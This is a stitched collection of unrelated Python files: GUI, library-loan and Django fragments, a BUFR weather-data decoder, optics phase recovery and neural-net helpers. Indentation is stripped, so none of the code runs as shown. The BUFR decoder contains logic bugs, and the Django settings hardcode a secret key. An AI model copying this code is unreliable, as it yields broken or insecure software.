lbling4 = Label(main_frame, image=self.photoimg6, bd=0, relief=RIDGE)
lbling4.place(x=0, y=635, width=230, height=190)
def customer_details(self):
self.new_window = Toplevel(self.root)
self.app = Customer_Window(self.new_window)
if __name__ == "__main__":
root = Tk()
obj = Hotel_Management_System(root)
root.mainloop() |
#coding:utf-8
import datetime
import web
import op_reader
import op_book
import op_borrow
from model_base import ModelBase
from model_giveback import ModelGiveback
from model_lost import ModelLost
class ModelRenew(ModelBase):
def check_borrexp(self, borrnow):
return borrnow.borrexpdt.date() >= datetime.datetime.now().date()
def check_renewtimes(self, borrnow, reader):
return borrnow.renewtimes < reader.typrenewtimes
def ui_reader(self, readercardno):
reader = self.get_reader(readercardno)
if not reader: return
op_reader.bind_ref(reader)
borrnowArr = []
for b in self.query_borrnow2(reader.readerid):
op_book.bind_ref(b)
b.notborrexp_c = self.check_borrexp(b)
b.renewtimes_c = self.check_renewtimes(b, reader)
give = ModelGiveback()
b.overdays_c = give.calc_overdays(b)
b.typoverprice_c = reader.typoverprice
b.overprice_c = give.calc_overprice(b.overdays_c, reader)
lost = ModelLost()
b.typlostpay_c = reader.typlostpay
b.lostprice_c = lost.calc_lostprice(b, reader)
b.sumprice_c = b.overprice_c + b.lostprice_c
borrnowArr.append(b)
reader.borrnowArr = borrnowArr
return reader
def post_renew(self, operator, bookinsid, newexpdt, renewtimes):
op_borrow.renew(operator, bookinsid, newexpdt, renewtimes)
def renew(self, operator, bookinsid, bookclsid = None, bookname = None):
borrnow = self.get_borrnow(bookinsid)
if not borrnow: return False
if not self.check_borrexp(borrnow): return False
reader = self.get_reader(borrnow.readercardno)
if not reader: return False
if not self.check_renewtimes(borrnow, reader): return False
self.newexpdt = borrnow.borrexpdt + datetime.timedelta(days = reader.typrenewterm)
self.renewtimes = borrnow.renewtimes + 1
self.post_renew(operator, bookinsid, self.newexpdt, self.renewtimes)
self.log(insby = operator,
readercardno = borrnow.readercardno,
readerid = borrnow.readerid,
readername = reader.readername,
bookclsid = bookclsid,
bookinsid = bookinsid,
bookname = bookname,
actcd = 'RENEW',
actval = self.renewtimes)
return True
def ui_renew(self, operator, bookinsid, bookclsid = None, bookname = None):
ret = web.Storage()
if self.renew(operator, bookinsid, bookclsid, bookname):
ret.newexpdt = self.newexpdt
ret.renewtimes = self.renewtimes
return ret
|
from rest_framework import serializers
from Blog.models import MovieShots
class MovieShotsSerializer(serializers.ModelSerializer):
class Meta:
model = MovieShots
fields = '__all__' |
import unittest
from . import utils as TE
class TestReqifEnumValue(unittest.TestCase):
def setUp(self):
self.obj = TE.TReqz.reqif_enum_value()
def test_name(self):
self.assertEqual("ENUM-VALUE", self.obj.name)
def test_decode(self):
TE.utils.testDecodeIdentifiableAttributes(self, self.obj)
TE.utils.decodeObj(self.obj, '<ENUM-VALUE><PROPERTIES><EMBEDDED-VALUE /></PROPERTIES></ENUM-VALUE>', None)
self.assertIsNotNone(self.obj.embedded_value)
self.assertEqual("EMBEDDED-VALUE", self.obj.embedded_value.name)
def test_encode(self):
TE.utils.testEncodeIdentifiableAttributes(self, self.obj)
self.assertEqual("<ENUM-VALUE><PROPERTIES><EMBEDDED-VALUE /></PROPERTIES></ENUM-VALUE>", TE.utils.encodeObj(self.obj, {'embedded_value':TE.TReqz.reqif_embeded_value()}))
self.assertEqual("<ENUM-VALUE />", TE.utils.encodeObj(self.obj, {'embedded_value':None})) |
# Django settings for mango project.
from django.utils.translation import ugettext_lazy as _
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME' : os.path.join(os.path.dirname(__file__), "mango.db")
},
# For the mirrors application
#'gnome_mirrors': {
# 'ENGINE' : 'django.db.backends.mysql',
# 'NAME' : 'mirrors',
# 'USER' : 'dbuser',
# 'PASSWORD' : 'dbpass',
#},
# For the requests application
#'account_requests': {
# 'ENGINE' : 'django.db.backends.mysql',
# 'NAME' : 'mango',
# 'USER' : 'dbuser',
# 'PASSWORD' : 'dbpass',
#},
}
DATABASE_ROUTERS = [
"ldapdb.router.Router",
"mango.mirrors.routers.MirrorRouter",
"mango.requests.routers.AccountRequestRouter",
"mango.members.routers.FoundationMemberRouter",
]
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/static_media/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'u(9-ndez*a1wi-438du+!rx$o+7nntz1w$tb0i_3m)+w$jt=sh'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
)
SESSION_ENGINE = "django.contrib.sessions.backends.file"
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.request',
)
ROOT_URLCONF = 'mango.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(os.path.dirname(__file__), "templates"),
)
INSTALLED_APPS = (
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.auth',
'django.contrib.admin',
# For natural days in account requests
'django.contrib.humanize',
# Actual mango applications
'users',
'mirrors',
'members',
'requests',
# For the pretty
'uni_form',
# For the omni-search
'haystack',
)
# For the omni-search box to work
HAYSTACK_SITECONF = 'mango.search_sites'
HAYSTACK_SEARCH_ENGINE = 'whoosh'
HAYSTACK_WHOOSH_PATH = os.path.join(os.path.dirname(__file__), "search_indexes.whoosh")
MANGO_USER_HOMEDIR_BASE = '/home/users'
PROJECT_TITLE = _('GNOME Mango Accounts System')
# local_settings.py can be used to override environment-specific settings
# like database and email that differ between development and production.
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
local_settings = os.path.join(PROJECT_ROOT, 'local_settings.py')
if os.path.isfile(local_settings):
try:
execfile(local_settings)
except:
pass
|
import logging
import os
from wikipedia import page
import word2vec.word2vec_utitlity as util
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
logger = logging.getLogger("TrainingDataImporter")
class WikipediaPageProcessor:
"""
"""
file_prefix = "wiki_"
def __init__(self, titles, training_data_directory="../training/"):
self.titles = titles
self.source_files = training_data_directory+"sources/"
self.preprocessed_files = training_data_directory+"processed/"
def download(self):
logger.info("Start downloading pages from wikipedia: " + str(self.titles))
for title in self.titles:
filepath = self.source_files + self.file_prefix + title + ".txt"
if os.path.exists(filepath):
logger.info("File " + title + " already exists in target directory. Skipping file")
continue
logger.info("Loading wikipage: " + title)
wikipage = page(title, auto_suggest=False)
content = wikipage.content
os.makedirs(os.path.dirname(filepath), exist_ok=True)
with open(filepath, "w") as f:
f.write(content)
logger.info("Finished downloading wikipedia articles")
def process(self):
stop = util.get_stopwords()
logger.info("Loading source files for pre-processing")
for title in self.titles:
target_filepath = self.preprocessed_files + self.file_prefix + title + ".txt"
source_filepath = self.source_files + self.file_prefix + title + ".txt"
if os.path.exists(target_filepath):
logger.info("File " + title + " already exists in target directory. Skipping file")
continue
logger.info("Pre-processing file: " + title)
if not os.path.exists(source_filepath):
logger.warning("Sourcefile " + title + " does not exist. Skipping...")
continue
with open(source_filepath, "r") as f_in:
os.makedirs(os.path.dirname(target_filepath), exist_ok=True)
with open(target_filepath, "w") as f_out:
for line in f_in:
cleaned_content = util.clean_str(line)
cleaned_words = cleaned_content.split()
tokens = [word for word in cleaned_words if word not in stop]
f_out.write(" ".join(tokens) + os.linesep)
logger.info("Pre-processing finished.")
|
# -- coding: utf-8
x=int(input())
x1=x//1000
x2=x%1000//100
x3=x%1000%100//10
x4=x%1000%100%10
print ('У числа ', x, 'максимальная цифра равна ', max(x1, x2, x3, x4)) |
#! /usr/bin/python
"""
Phase recovery from two measured intensity distributions using Gerchberg Saxton.
.. :copyright: (c) 2017 by Fred van Goor.
:license: MIT, see License for more details.
"""
import matplotlib.pyplot as plt
import numpy as np
from LightPipes import *
print(LPversion)
#Parameters used for the experiment:
size=11*mm; #The CCD-sensor has an area of size x size (NB LightPipes needs square grids!)
wavelength=632.8*nm; #wavelength of the HeNe laser used
z=2*m; #propagation distance from near to far field
N_iterations=300 #number of iterations
#Read near and far field (at a distance of z=2 m) from disk:
f=open('Inear.prn','r')
lines=f.readlines()
f.close()
data = [line.split() for line in lines]
Inear = np.asfarray(data)
f=open('Ifar.prn','r')
lines=f.readlines()
f.close()
data = [line.split() for line in lines]
Ifar = np.asfarray(data)
N=len(Inear)
N_new=256;size_new=40*mm;
plt.subplot(3,2,1);plt.imshow(Inear,cmap='jet');
plt.title('Measured Intensity near field'); plt.axis ('off');
plt.subplot(3,2,2);plt.imshow(Ifar,cmap='jet');
plt.title('Measured Intensity far field');plt.axis ('off');
#Define a field with uniform amplitude- (=1) and phase (=0) distribution
#(= plane wave)
F=Begin(size,wavelength,N);
#The iteration:
for k in range(1,100):
print(k)
F=SubIntensity(Ifar,F) #Substitute the measured far field into the field
F=Interpol(size_new,N_new,0,0,0,1,F);#interpolate to a new grid
F=Forvard(-z,F) #Propagate back to the near field
F=Interpol(size,N,0,0,0,1,F) #interpolate to the original grid
F=SubIntensity(Inear,F) #Substitute the measured near field into the field
F=Forvard(z,F) #Propagate to the far field
#The recovered far- and near field and their phase- and intensity
#distributions (phases are unwrapped (i.e. remove multiples of PI)):
Ffar_rec=F;
Ifar_rec=Intensity(0,Ffar_rec); Phase_far_rec=Phase(Ffar_rec);
Phase_far_rec=PhaseUnwrap(Phase_far_rec)
Fnear_rec=Forvard(-z,F);
Inear_rec=Intensity(0,Fnear_rec); Phase_near_rec=Phase(Fnear_rec);
Phase_near_rec=PhaseUnwrap(Phase_near_rec)
#Plot the recovered intensity- and phase distributions:
plt.subplot(3,2,3);plt.imshow(Inear_rec,cmap='jet');
plt.title('Recovered Intensity near field'); plt.axis ('off')
plt.subplot(3,2,4);plt.imshow(Ifar_rec,cmap='jet');
plt.title('Recovered Intensity far field'); plt.axis ('off')
plt.subplot(3,2,5);plt.imshow(Phase_near_rec,cmap='jet');
plt.title('Recovered phase near field');plt.axis ('off')
plt.subplot(3,2,6);plt.imshow(Phase_far_rec,cmap='jet');
plt.title('Recovered phase far field'); plt.axis ('off')
plt.show()
|
# Empty class sample
class EmpltyClass:
pass
# Sample var & Method declaration
class FirstLevelSample:
print('First Hello From FirstLevelSample Class')
f1 = FirstLevelSample()
e = EmpltyClass()
print(e) |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('realms', '0017_auto_20171213_1943'),
]
operations = [
migrations.AlterField(
model_name='page',
name='page_slug',
field=models.CharField(verbose_name='URL slug', max_length=255, blank=True, help_text='URL friendly name; lowercase, numbers and underscores only.'),
),
]
|
import torch
class Placeholder(torch.nn.Module):
"""
This model is used when doing predictions directly on embeddings.
It allows the training infrastructure to be used as normal, but
not pass data through the normal base_encoder.
Note that the out_shape is None.
"""
def __init__(self):
super().__init__()
self.name = "Placeholder"
def make_model(self, model_params):
self.in_shape = model_params['in_shape']
self.dims = len(self.in_shape)
self.out_channels = model_params["h_channels"]
self.out_shape = None
def forward(self, raw):
return raw
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Alexander Maul
#
# Author(s):
#
# Alexander Maul <alexander.maul@dwd.de>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
trollbufr-Subset
================
The class doing all decoding, table-loading, etc in the right order.
Created on Oct 28, 2016
@author: amaul
'''
import functions as f
from errors import BufrDecodeError
import logging
logger = logging.getLogger("trollbufr")
class Subset(object):
# Numbering of this subset (this, total)
subs_num = (-1, -1)
# Compression
is_compressed = False
# Currently decoding a subset
inprogress = False
# Holds table object
_tables = None
# Holds byte array with bufr
_blob = None
# Initial descriptor list
_desc = []
# End of data for all subsets
_data_e = -1
# Alterator values
_alter = {}
#
_skip_data = 0
def __init__(self, tables, bufr, descr_list, is_compressed, subset_num, data_end):
self._tables = tables
self._blob = bufr
self._desc = descr_list
self.is_compressed = is_compressed
self.subs_num = subset_num
self._data_e = data_end
def __str__(self):
return "Subset #%d/%d, decoding:%s" % (self.subs_num, self.inprogress)
def next_data(self):
"""
Iterator for Sect. 4 data
This generator will decode BUFR data.
For each data element the descriptor and a tuple of value and quality information is returned.
When a value for mark is returned, the others are None, and mark has the meaning:
- SEQ desc : Following descriptors by expansion of sequence descriptor desc.
- SEQ END : End of sequence expansion.
- RPL #n : Descriptor replication number #n begins.
- RPL END : End of descriptor replication.
- RPL NIL : Descriptor replication evaluated to zero replications.
- REP #n : Descriptor and data repetition, all descriptor and data between
this and REP END are to be repeated #n times.
- REP END : End of desriptor and data repetition.
RETURN: desc, mark, (value, quality)
"""
if self._blob.p < 0 or self._data_e < 0 or self._blob.p >= self._data_e:
raise BufrDecodeError("Data section start/end not initialised!")
logger.debug("SUBSET START")
self.inprogress = True
# Stack for sequence expansion and loops.
# Items follow: ([desc,], start, end, mark)
stack = []
# Alterator values, this resets them at the beginning of the iterator.
self._alter = self._reset_alter()
# For start put list on stack
logger.debug("PUSH start -> *%d %d..%d" , len(self._desc), 0, len(self._desc))
stack.append((self._desc, 0, len(self._desc), "SUB"))
while len(stack):
"""Loop while descriptor lists on stack"""
# dl : current descriptor list
# di : index for current descriptor list
# de : stop when reaching this index
dl, di, de, mark = stack.pop()
logger.debug("POP *%d %d..%d (%s)" , len(dl), di, de, mark)
yield None, mark, (None, None)
mark = None
while di < de and self._blob.p < self._data_e:
"""Loop over descriptors in current list"""
if self._skip_data:
"""Data not present: data is limited to class 01-09,31"""
self._skip_data -= 1
if dl[di] >= 10000 and dl[di] % 1000 != 31:
di += 1
continue
if dl[di] == 0:
"""Null-descriptor to signal end-of-list"""
di += 1
elif dl[di] > 0 and dl[di] < 100000:
"""Element descriptor, decoding bits to value"""
# Associated fields (for qualifier) preceede the elements value,
# their width is set by an operator descr.
# They are handled in compression in same manner as other descr,
# with fix width from assoc-field-stack.
if self._alter['assoc'][-1] and (dl[di] < 31000 or dl[di] > 32000):
qual = f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=self._alter['assoc'][-1])
else:
qual = None
elem_b = self._tables.tab_b[dl[di]]
di += 1
foo = f.get_rval(self._blob, self.is_compressed, self.subs_num, elem_b, self._alter)
v = f.rval2num(elem_b, self._alter, foo)
# This is the main yield
yield elem_b.descr, mark, (v, qual)
elif dl[di] >= 100000 and dl[di] < 200000:
"""Replication descriptor, loop/iterator, replication or repetition"""
# Decode loop-descr:
# amount of descr
lm = dl[di] // 1000 - 100
# number of replication
ln = dl[di] % 1000
# Repetition?
ir = False
# Increase di to start-of-loop
di += 1
if ln == 0:
# Decode next descr for loop-count
if dl[di] < 30000 or dl[di] >= 40000:
raise BufrDecodeError("No count for delayed loop!")
elem_b = self._tables.tab_b[dl[di]]
di += 1
# TODO: are the 031xxx really not altered?
ln = f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=elem_b.width)
# Descriptors 31011+31012 mean repetition, not replication
ir = elem_b.descr >= 31010 and elem_b.descr <= 31012
logger.debug("%s %d %d -> %d from %06d", "REPT" if ir else "LOOP", lm, 0, ln, elem_b.descr)
if ln == 255:
ln = 0
else:
logger.debug("LOOP %d %d" % (lm, ln))
# Current list on stack (di points after looped descr)
logger.debug("PUSH jump -> *%d %d..%d" , len(dl), di + lm, de)
if ir:
if ln:
stack.append((dl, di + lm, de, "REP END"))
stack.append((dl, di, di + lm, "REP %d" % ln))
else:
stack.append((dl, di + lm, de, "REP NIL"))
else:
stack.append((dl, di + lm, de, "RPL %s" % ("END" if ln else "NIL")))
while ln:
# N*list on stack
logger.debug("PUSH loop -> *%d %d..%d" , len(dl), di , di + lm)
stack.append((dl, di, di + lm, "RPL %d" % ln))
ln -= 1
# Causes inner while to end
di = de
elif dl[di] >= 200000 and dl[di] < 300000:
"""Operator descritor, alter/modify properties"""
di, v = self._eval_oper(dl, di, de)
if v is not None:
# If the operator (signify) returned a value, yield it
yield v
di += 1
elif dl[di] >= 300000 and dl[di] < 400000:
"""Sequence descriptor, replaces current descriptor with expansion"""
logger.debug("SEQ %06d" , dl[di])
# Current on stack
logger.debug("PUSH jump -> *%d %d..%d" , len(dl), di + 1, de)
stack.append((dl, di + 1, de, "SEQ END"))
prevdesc = dl[di]
# Sequence from tabD
dl = self._tables.tab_d[dl[di]]
# Expansion on stack
logger.debug("PUSH seq -> *%d %d..%d" , len(dl), 0, len(dl))
stack.append((dl, 0, len(dl), "SEQ %06d" % prevdesc))
# Causes inner while to end
di = de
else:
"""Invalid descriptor, out of defined range"""
raise BufrDecodeError("Descriptor '%06d' invalid!" % dl[di])
self.inprogress = False
logger.debug("SUBSET END (%s)" % self._blob)
raise StopIteration
def _eval_oper(self, dl, di, de):
"""
Evaluate operator, read octets from data section if necessary.
RETURN: di, (desc,mark,(value,qual))|None
"""
l_di = di
l_rval = None
if dl[l_di] < 222000:
am = dl[l_di] // 1000 - 200
an = dl[l_di] % 1000
logger.debug("OP %d %d", am, an)
if am == 1:
"""Change data width"""
self._alter['wnum'] = an - 128 if an else 0
elif am == 2:
"""Change scale"""
self._alter['scale'] = an - 128 if an else 0
elif am == 3:
"""Set of new reference values"""
if an == 0:
self._alter['refval'] = {}
else:
l_di = self._read_refval(dl, l_di, de)
logger.debug("OP refval -> %s" % self._alter['refval'])
elif am == 4:
"""Add associated field, shall be followed by 031021"""
# Manages stack for associated field, the value added last shall be used.
if an == 0:
self._alter['assoc'].pop()
if not len(self._alter['assoc']):
self._alter['assoc'] = [0]
else:
self._alter['assoc'].append(self._alter['assoc'][-1] + an)
elif am == 5:
"""Signify with characters, plain language text as returned value"""
foo = f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=an * 8)
v = f.rval2str(foo)
logger.debug("OP text -> '%s'", v)
# Special rval for plain character
l_rval = (dl[l_di], None, (v, None))
elif am == 6:
"""Length of local descriptor"""
f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=an)
l_di += 1
elif am == 7:
if an == 0:
self._alter['scale'] = 0
self._alter['refmul'] = 1
self._alter['wnum'] = 0
else:
self._alter['scale'] = an
self._alter['refmul'] = 10 ^ an
self._alter['wnum'] = ((10 * an) + 2) / 3
elif am == 8:
"""Change data width for characters"""
self._alter['wchr'] = an * 8 if an else 0
elif am == 9:
"""IEEE floating point representation"""
self._alter['ieee'] = an
elif am == 21:
"""Data not present"""
self._skip_data = an
else:
raise BufrDecodeError("Operator %06d not implemented.", dl[l_di])
elif dl[l_di] == 222000:
"""Quality Assessment Information"""
logger.debug("OP %d", dl[l_di])
en = self._tables.tab_c.get(dl[l_di], ("Operator",))
# An additional rval for operators where no further action is required
l_rval = (dl[l_di], None, (en[0], None))
elif dl[l_di] == 223000 or dl[l_di] == 223255:
"""Substituted values"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 224000 or dl[l_di] == 224255:
"""First-order statistical values"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 225000 or dl[l_di] == 225255:
"""Difference statistical values"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 232000 or dl[l_di] == 232255:
"""Replaced/retained vaules"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 235000:
"""Cancel backward data reference"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 236000:
"""Define data present bit-map"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 237000:
"""Use data present bit-map"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 237255:
"""Cancel data present bit-map"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 241000:
"""Define event"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 241255:
"""Cancel event"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 242000:
"""Define conditioning event"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 242255:
"""Cancel conditioning event"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 243000:
"""Categorial forecast values follow"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
elif dl[l_di] == 243255:
"""Cancel categorial forecast"""
raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
else:
raise BufrDecodeError("Operator %06d not implemented."% dl[l_di])
return l_di, l_rval
def _read_refval(self, dl, di, de):
"""
Reads a set of YYY bits, taking them as new reference values for the descriptors of the set.
YYY is taken from the current descriptor dl[di], reference values are set for
all subsequent following descriptors until the descriptor signaling the end of operation occurs.
RETURN: number of new reference values
"""
i = di
rl = {}
an = dl[i] % 1000
i += 1
while i < de:
rval = f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=an)
# Sign=high-bit
sign = -1 if 1 << (an - 1) else 1
# Value=val&(FFF>>1)
val = ((1 << an) - 1) & rval
rl[dl[i]] = sign * val
i += 1
if dl[i] > 200000 and dl[i] % 1000 == 255:
# YYY==255 is signal-of-end
break
self._alter['refval'] = rl
return i
def _reset_alter(self):
return {
'wnum':0, # Add to width, for number data fields.
'wchr':0, # Change width for string data fields.
'refval':{}, # {desc:ref}, dict with new reference values for descriptors.
'refmul':1, # Multiplier, for all reference values of following descriptors (207yyy).
'scale':0, # Add to scale, for number data fields.
'assoc':[0], # Add width for associated quality field. A stack, always use last value.
'ieee':0, # 0|32|64 All numerical values encoded as IEEE floating point number.
}
|
from math import *
import numpy as np
import random
import sys
def identity(x): return x
class Cost(object):
""" """
def __init__(self, type='Bernoulli'):
self.type = type
if type == 'Bernoulli':
self.F = Cost.Bernoulli_function
self.D = Cost.Bernoulli_derivative
elif type == 'square':
self.F = Cost.square_function
self.D = Cost.square_derivative
elif type == 'hamming':
self.F = Cost.hamming_function
self.D = Cost.hamming_derivative
else:
raise ValueError
@staticmethod
def support_functions():
return [ 'Bernoulli', 'square', 'hamming' ]
@staticmethod
@np.vectorize
def likelihood(y, h):
res, eps = 0., np.finfo(float).eps
# ---------------------------
y0, y1 = np.fabs(y - 0.) < eps, np.fabs(y - 1.) < eps
h0, h1 = np.fabs(h - 0.) < eps, np.fabs(h - 1.) < eps
# ---------------------------
res = eps if (y0 or h1) else ( y * np.log( h if (not h0) else eps))
res += eps if (y1 or h0) else ((1.-y) * np.log((1.-h) if (not h1) else eps))
# ---------------------------
return res
@staticmethod
def Bernoulli_function(y, h):
""" -sum( y * np.log(h) - (1. - y) * np.log(1. - h) ) """
return - np.sum( Cost.likelihood(y, h), axis=1 )
@staticmethod
@np.vectorize
def Bernoulli_derivative(y, h):
""" (y / h) - (1. - y) / (1. - h) """
# ---------------------------
eps = np.finfo(float).eps
h0, h1 = np.fabs(h-0.) < eps, np.fabs(h-1.) < eps
# ---------------------------
res = ((1.-y)/(1.-h) if (not h1) else (1.-y)/eps)
res -= ( y / h if (not h0) else y /eps)
# ---------------------------
return res
@staticmethod
def square_function(y, h):
return np.sum(np.power(y - h, 2), axis=1) / 2.
@staticmethod
def square_derivative(y, h):
return y - h;
@staticmethod
def hamming_function(y, h):
return np.sum(np.abs(y - h), axis=1)
@staticmethod
def hamming_derivative(y, h):
return np.sign(y - h)
class Activation(object):
""" """
def __init__(self, type='sigmoid'):
""" """
self.type = type
if type == 'identity':
self.F = identity
self.D = np.ones_like
elif type == 'sigmoid':
self.F = Activation.sigmoid_function
self.D = Activation.sigmoid_derivative
elif type == 'hyperbolic':
self.F = Activation.hyperbolic_function
self.D = Activation.hyperbolic_derivative
elif type == 'softmax':
self.F = Activation.softmax_function
self.D = Activation.softmax_derivative
elif type == 'ReLU':
self.F = Activation.ReLU_function
self.D = Activation.ReLU_derivative
elif type == 'rectifier':
self.F = Activation.rectifier_function
self.D = Activation.rectifier_derivative
else:
raise ValueError
@staticmethod
def support_functions():
return [ 'identity', 'sigmoid', 'hyperbolic',
'softmax', 'ReLU', 'rectifier' ]
@staticmethod
def sigmoid_function(x, a=1.):
return 1. / ( 1. + np.exp(-a * x) )
@staticmethod
def sigmoid_derivative(x, a=1.):
s = Activation.sigmoid_function(x, a)
return a * s * (np.ones_like(s) - s)
@staticmethod
def hyperbolic_function(x, a=1.):
""" np.exp(a * x) - np.exp(-a * x)
------------------------------
np.exp(a * x) + np.exp(-a * x)
"""
return np.tanh(a * x)
@staticmethod
def hyperbolic_derivative(x, a=1.):
h = Activation.hyperbolic_function(x, a)
return a * (1. - h * h)
@staticmethod
def softmax_function(x):
""" exp(m_i) / sum_i( exp(m_i) ), i is index of dimension """
e = np.exp(x) # (x - np.max(x)) # prevent overflow
return e / np.sum(e)
@staticmethod
def softmax_derivative(x):
s = Activation.softmax_function(x)
return s * (1. - s)
@staticmethod
def ReLU_function(x):
return x * (x > 0.)
@staticmethod
def ReLU_derivative(x):
return 1. * (x > 0.)
@staticmethod
def rectifier_function(x):
return np.log( 1. + np.exp(x) )
@staticmethod
def rectifier_derivative(x):
return Activation.sigmoid_function(x)
class Regularization(object):
""" """
def __init__(self, type='L2'):
""" """
self.type = type
if type == 'L0':
self.F = identity
self.D = np.ones_like
elif type == 'L1':
self.F = Regularization.L1_F
self.D = Regularization.L1_D
elif type == 'L2':
self.F = Regularization.L2_F
self.D = identity
else:
raise Exception('Supported functions: L0, L1, L2')
@staticmethod
def support_functions(): return [ 'L0', 'L1', 'L2' ]
@staticmethod
def L1_F(x): return (x > 0) * 2 - 1.0 # sign(x) = x / abs(x)
@staticmethod
def L1_D(x): return np.sum(np.abs( x.reshape( (1, np.prod(x.shape)) ) ))
@staticmethod
def L2_F(x): return np.sum(np.power( x.reshape( (1, np.prod(x.shape)) ), 2)) * 0.5
|
from typing import List
# The following 3 lines of codes are for UnitTest and you don't need them for your real applications!
global shopping_list
global stock
global prices
shopping_list = ["banana", "orange", "apple"]
stock = {
"banana": 6,
"apple": 0,
"orange": 32,
"pear": 15
}
prices = {
"banana": 4,
"apple": 2,
"orange": 1.5,
"pear": 3
}
# Write your code below!
def compute_bill(food: List[str]) -> float:
total = 0
for item in food:
if stock[item] > 0:
total += prices[item]
stock[item] -= 1
return total
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CS671 - Deep Learning and Its Applications
Even Semester 2018
Assignment 1, Group 3
Input generation for Q1.
"""
import sys
from random import randint, uniform
# Integers.
file = open("../data/input/q1/input1.txt", "w")
sys.stdout = file
for _ in range(10):
print (str(randint(1, 9))+' '+str(randint(1, 9)))
# Float.
file = open("../data/input/q1/input2.txt", "w")
sys.stdout = file
for _ in range(10):
print (str(uniform(1, 9))+' '+str(uniform(1, 9))) |
import inspect
import time
import numpy as np
import matplotlib.pyplot as plt
from skimage import io
import tensorflow as tf
from app_global import FLAGS
from tensorflow.examples.tutorials.mnist import input_data
from rbm_engine import Rbm_Engine
from mlp_engine import Mlp_Engine
class Dbn_Engine(object):
# 采用习惯用法定义常量
TRAIN_MODE_NEW = 1
TRAIN_MODE_CONTINUE = 2
def __init__(self):
self.datasets_dir = 'datasets/'
self.random_seed = 1
self.rbm_W = []
self.rbm_b = []
self.rbms = []
self.rbm_graphs = []
self.layers = [1024,784,512,256]
self.name = 'dbn'
prev = 784
self.mlp_engine = None
for idx, layer in enumerate(self.layers):
rbm_str = 'rbm_' + str(idx+1)
name = self.name + '_' + rbm_str
tf_graph = tf.Graph()
self.rbms.append(Rbm_Engine(name, tf_graph=tf_graph, n=prev,
num_hidden=layer))
prev = layer
self.rbm_graphs.append(tf_graph)
def run(self, ckpt_file='work/dae.ckpt'):
if self.mlp_engine is None:
self.mlp_engine = Mlp_Engine(self.rbms, 'datasets')
self.mlp_engine.run()
def pretrain(self, X_train, X_validation):
X_train_prev = X_train
X_validation_prev = X_validation
for idx, rbm in enumerate(self.rbms):
print('pretrain:{0}'.format(rbm.name))
tf_graph = self.rbm_graphs[idx]
X_train_prev, X_validation_prev = self.pretrain_rbm(
self.rbm_graphs[idx], rbm,
X_train_prev, X_validation_prev)
return X_train_prev, X_validation_prev
